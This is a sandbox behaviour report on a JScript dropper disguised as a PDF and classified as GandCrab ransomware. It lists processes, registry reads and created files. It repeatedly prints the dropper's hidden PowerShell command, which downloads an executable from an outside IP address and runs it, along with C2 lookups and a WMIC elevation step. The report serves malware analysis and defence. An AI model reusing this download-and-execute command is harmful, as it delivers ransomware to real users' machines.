Javascript Dropper #1 - Gandcrab Analysis | Grouped Behavior
VTI SCORE: 100/100
Target: Windows 10 (64-bit) | windows_script_files
Classification: Dropper, Downloader, Ransomware

b4b6f6c2588001e5b95eed79faf99a92b9d9224f65af6a92e055ddfb145a1ecc (SHA256)

DOC6131166051-PDF.js

JScript

Created at 2018-03-14 01:58:00

Notifications (2/3)

Some extracted files may be missing in the report since the total file extraction size limit was reached during the analysis. You can increase the limit in the configuration settings.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Monitored Processes

Process Overview
ID | PID | Monitor Reason | Integrity Level | Image Name | Command Line | Origin ID
#1 | 0xd7c | Analysis Target | Medium | cscript.exe | "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS" | -
#3 | 0xe6c | Child Process | Medium | cmd.exe | "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','%appdAta%qTP35.exe'); staRt-ProceSS '%appdAta%qTP35.exe' | #1
#5 | 0xe98 | Child Process | Medium | powershell.exe | powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'); staRt-ProceSS 'C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe' | #3
#6 | 0xfd8 | Child Process | Medium | roamingqtp35.exe | "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" | #5
#7 | 0xb74 | Child Process | Medium | nslookup.exe | nslookup politiaromana.bit ns1.virmach.ru | #6
#9 | 0xd40 | Autostart | Medium | roamingqtp35.exe | "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" | -
#11 | 0xdc4 | Child Process | Medium | nslookup.exe | nslookup politiaromana.bit ns1.virmach.ru | #9
#13 | 0xee4 | Child Process | Medium | nslookup.exe | nslookup politiaromana.bit ns1.virmach.ru | #9
#15 | 0x588 | Child Process | High (Elevated) | wmic.exe | "C:\Windows\SysWOW64\wbem\wmic.exe" process call create "cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" | #9
#17 | 0x330 | RPC Server | System (Elevated) | svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs | #15
#18 | 0xc50 | RPC Server | System (Elevated) | wmiprvse.exe | C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | #17
#19 | 0x6fc | Child Process | High (Elevated) | cmd.exe | cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe | #18
#21 | 0xcf0 | Child Process | High (Elevated) | roamingqtp35.exe | C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe | #19
#22 | 0xd48 | Child Process | High (Elevated) | nslookup.exe | nslookup politiaromana.bit ns1.virmach.ru | #21

Behavior Information - Grouped by Category

Process #1: cscript.exe
Information | Value
ID | #1
File Name | c:\windows\system32\cscript.exe
Command Line | "C:\Windows\System32\CScript.exe" "C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS"
Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\
Monitor | Start Time: 00:00:13, Reason: Analysis Target
Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration | 00:03:10
OS Process Information
Information | Value
PID | 0xd7c
Parent PID | 0x4f8 (c:\windows\explorer.exe)
Is Created or Modified Executable | False
Integrity Level | Medium
Username | X2VS1CUM\Nd9E1FYi
Enabled Privileges | SeChangeNotifyPrivilege
Thread IDs: 0xD80, 0xDC8, 0xDEC, 0xE00, 0xE04, 0xE28, 0xE2C, 0xE30, 0xE50
Host Behavior
COM (5)
Operation | Class | Interface | Additional Information | Success | Count
Create | F414C260-6AC0-11CF-B6D1-00AA00BBBB58 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER | True | 1
Create | 00000323-0000-0000-C000-000000000046 | 00000146-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER | True | 1
Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER | True | 1
Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER | True | 1
Create | ShEll.aPplIcAtiON | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER | True | 1
File (6)
Operation | Filename | Additional Information | Success | Count
Create | C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ | True | 1
Get Info | C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS | type = size | True | 1
Get Info | - | type = size | True | 1
Open | STD_OUTPUT_HANDLE | - | True | 1
Read | - | size = 3717, size_out = 3717 | True | 1
Write | STD_OUTPUT_HANDLE | size = 110 | True | 1
Registry (30)
Operation | Key | Additional Information | Success | Count
Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - | True | 1
Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - | True | 1
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - | True | 2
Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - | True | 2
Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - | True | 1
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - | True | 1
Open Key | HKEY_CLASSES_ROOT\.JS | - | True | 1
Open Key | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | - | True | 1
Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features | - | False | 1
Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | - | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 144, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 144, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 144, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE | False | 1
Read Value | HKEY_CLASSES_ROOT\.JS | data = JSFile, type = REG_SZ | True | 1
Read Value | HKEY_CLASSES_ROOT\JSFile\ScriptEngine | data = JScript, type = REG_SZ | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 | value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Process (1)
Operation | Process | Additional Information | Success | Count
Create | Cmd.exe | show_window = 161790939264 | True | 1
Module (24)
Operation | Module | Additional Information | Success | Count
Load | kernel32.dll | base_address = 0x7ffc17120000 | True | 2
Load | amsi.dll | base_address = 0x7ffc0fae0000 | True | 1
Load | WLDP.DLL | base_address = 0x7ffc049f0000 | True | 1
Load | C:\Windows\system32\advapi32.dll | base_address = 0x7ffc16250000 | True | 1
Get Handle | c:\windows\system32\cscript.exe | base_address = 0x7ff6ca030000 | True | 1
Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc17120000 | True | 1
Get Handle | c:\windows\system32\kernelbase.dll | base_address = 0x7ffc14550000 | True | 1
Get Filename | c:\windows\system32\cscript.exe | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 261 | True | 1
Get Filename | - | process_name = c:\windows\system32\cscript.exe, file_name_orig = C:\Windows\System32\CScript.exe, size = 260 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ffc17143270 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = HeapSetInformation, address_out = 0x7ffc17147430 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 | True | 1
Get Address | c:\windows\system32\amsi.dll | function = AmsiInitialize, address_out = 0x7ffc0fae2260 | True | 1
Get Address | c:\windows\system32\amsi.dll | function = AmsiScanString, address_out = 0x7ffc0fae26b0 | True | 1
Get Address | c:\windows\system32\kernelbase.dll | function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 | True | 1
Get Address | c:\windows\system32\kernelbase.dll | function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 | True | 1
Get Address | c:\windows\system32\wldp.dll | function = WldpGetLockdownPolicy, address_out = 0x7ffc049f1010 | True | 1
Get Address | c:\windows\system32\wldp.dll | function = WldpIsClassInApprovedList, address_out = 0x7ffc049f37b0 | True | 1
Get Address | c:\windows\system32\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x7ffc1625ac70 | True | 1
Get Address | c:\windows\system32\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x7ffc16262db0 | True | 1
Get Address | c:\windows\system32\advapi32.dll | function = SaferCloseLevel, address_out = 0x7ffc16266290 | True | 1
Create Mapping | C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS | filename = C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS, protection = PAGE_READONLY, maximum_size = 3717 | True | 1
Map | C:\Users\Nd9E1FYi\Desktop\DOC613~1.JS | process_name = c:\windows\system32\cscript.exe, desired_access = FILE_MAP_READ | True | 1
Window (1)
Operation | Window Name | Additional Information | Success | Count
Create | - | class_name = WSH-Timer, wndproc_parameter = 2273907775344 | True | 1
System (12)
Operation | Additional Information | Success | Count
Sleep | duration = -1 (infinite) | True | 2
Get Time | type = Ticks, time = 97921 | True | 2
Get Info | type = Operating System | True | 4
Get Info | type = Operating System | True | 1
Get Info | type = System Directory | True | 1
Get Info | type = System Directory, result_out = C:\Windows\system32 | True | 1
Get Info | type = Hardware Information | True | 1
Environment (1)
Operation | Additional Information | Success | Count
Get Environment String | name = JS_PROFILER | False | 1
Process #3: cmd.exe
Information | Value
ID | #3
File Name | c:\windows\system32\cmd.exe
Command Line | "C:\Windows\System32\cmd.exe" /c powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','%appdAta%qTP35.exe'); staRt-ProceSS '%appdAta%qTP35.exe'
Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\
Monitor | Start Time: 00:00:23, Reason: Child Process
Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration | 00:03:00
OS Process Information
Information | Value
PID | 0xe6c
Parent PID | 0xd7c (c:\windows\system32\cscript.exe)
Is Created or Modified Executable | False
Integrity Level | Medium
Username | X2VS1CUM\Nd9E1FYi
Enabled Privileges | SeChangeNotifyPrivilege
Thread IDs: 0xE70, 0xE94
Host Behavior
File (11)
Operation | Filename | Additional Information | Success | Count
Get Info | C:\Users\Nd9E1FYi\Desktop | type = file_attributes | True | 2
Get Info | powershell.exe | type = file_attributes | False | 1
Open | STD_OUTPUT_HANDLE | - | True | 5
Open | STD_INPUT_HANDLE | - | True | 3
Registry (17)
Operation | Key | Additional Information | Success | Count
Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - | False | 1
Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - | True | 1
Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 0, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE | False | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN | True | 1
Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE | False | 1
Process (1)
Operation | Process | Additional Information | Success | Count
Create | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | os_pid = 0xe98, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL | True | 1
Module (8)
Operation | Module | Additional Information | Success | Count
Get Handle | c:\windows\system32\cmd.exe | base_address = 0x7ff6b2520000 | True | 1
Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffc17120000 | True | 2
Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x7ffc17143270 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x7ffc17148940 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7ffc17147460 | True | 1
Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x7ffc145a6e50 | True | 1
Environment (21)
Operation | Additional Information | Success | Count
Get Environment String | - | True | 7
Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ | True | 2
Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC | True | 2
Get Environment String | name = PROMPT | False | 1
Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe | True | 1
Get Environment String | name = KEYS | False | 1
Get Environment String | name = appdAta, result_out = C:\Users\Nd9E1FYi\AppData\Roaming | True | 2
Set Environment String | name = PROMPT, value = $P$G | True | 1
Set Environment String | name = =C:, value = C:\Users\Nd9E1FYi\Desktop | True | 1
Set Environment String | name = COPYCMD | True | 1
Set Environment String | name = =ExitCode, value = 00000000 | True | 1
Set Environment String | name = =ExitCodeAscii | True | 1
Process #5: powershell.exe
1453 18
»
Information Value
ID #5
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://92.63.197.38/letsgo.exe?LbPUer','C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'); staRt-ProceSS 'C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe'
Initial Working Directory C:\Users\Nd9E1FYi\Desktop\
Monitor Start Time: 00:00:24, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:02:59
OS Process Information
Information Value
PID 0xe98
Parent PID 0xe6c (c:\windows\system32\cmd.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
For performance reasons, the remaining 84 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\local\temp\4yreaw5k.md3.ps1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\nd9e1fyi\appdata\local\temp\dppe3wwf.ebw.psm1 0.00 KB MD5: c4ca4238a0b923820dcc509a6f75849b
SHA1: 356a192b7913b04c54574d18c28d46e6395428ab
SHA256: 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
False
c:\users\nd9e1fyi\appdata\roamingqtp35.exe 278.51 KB MD5: 64fe3cc06265bca6cc175cecfc16fc2e
SHA1: 3f02ee202bd9040c25a3caf6af905345e458dc46
SHA256: 063cf82cd52acb6a0539a6ff59f72fb5de473293a06c470a92c6d35a151b73e9
False
Modified Files
Filename File Size Hash Values YARA Match Actions
c:\users\nd9e1fyi\appdata\local\microsoft\windows\powershell\commandanalysis\powershell_analysiscacheindex 19.46 KB MD5: 209a126e4839093dbd140950fa232dff
SHA1: a98ffb3882b8f519eede39d32935578d6e4c774b
SHA256: 8ff6e7821f5e3cea46c176bd5ccc51c24ac089de25cfa18412726d00c0d59b75
False
Host Behavior
File (754)
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Create C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 2
Create C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1
Create Pipe \device\namedpipe\pshost.131654663177492805.3736.defaultappdomain.powershell open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config type = file_attributes False 3
Get Info C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_attributes True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_attributes True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_attributes True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml type = file_attributes True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml type = file_attributes True 1
Get Info STD_OUTPUT_HANDLE type = file_type True 1
Get Info - type = file_type True 1
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5
Get Info C:\ type = file_attributes True 2
Get Info C:\Windows\system32\wldp.dll type = file_attributes True 18
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\ type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 type = file_type True 2
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 type = file_type True 2
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\4yreaw5k.md3.ps1 type = file_attributes True 1
Get Info C:\Users\Nd9E1FYi\AppData\Local\Temp\dppe3wwf.ebw.psm1 type = file_attributes True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml type = file_type True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml type = file_type True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml type = file_type True 4
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml type = file_type True 4
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 9
Get Info C:\Users type = file_attributes True 4
Get Info STD_INPUT_HANDLE type = file_type True 1
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe type = file_attributes True 1
Get Info C:\ProgramData\Oracle\Java\javapath type = file_attributes True 32
Get Info C:\Windows\system32 type = file_attributes True 23
Get Info C:\Windows type = file_attributes True 16
Get Info C:\Windows\System32\Wbem type = file_attributes True 16
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\ type = file_attributes True 9
Get Info C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules type = file_attributes False 6
Get Info C:\Program Files\WindowsPowerShell\Modules type = file_attributes True 3
Get Info C:\Windows\system32\WindowsPowerShell\v1.0\Modules type = file_attributes True 3
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Appx type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker type = file_attributes True 1
Get Info c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1 type = file_attributes True 1
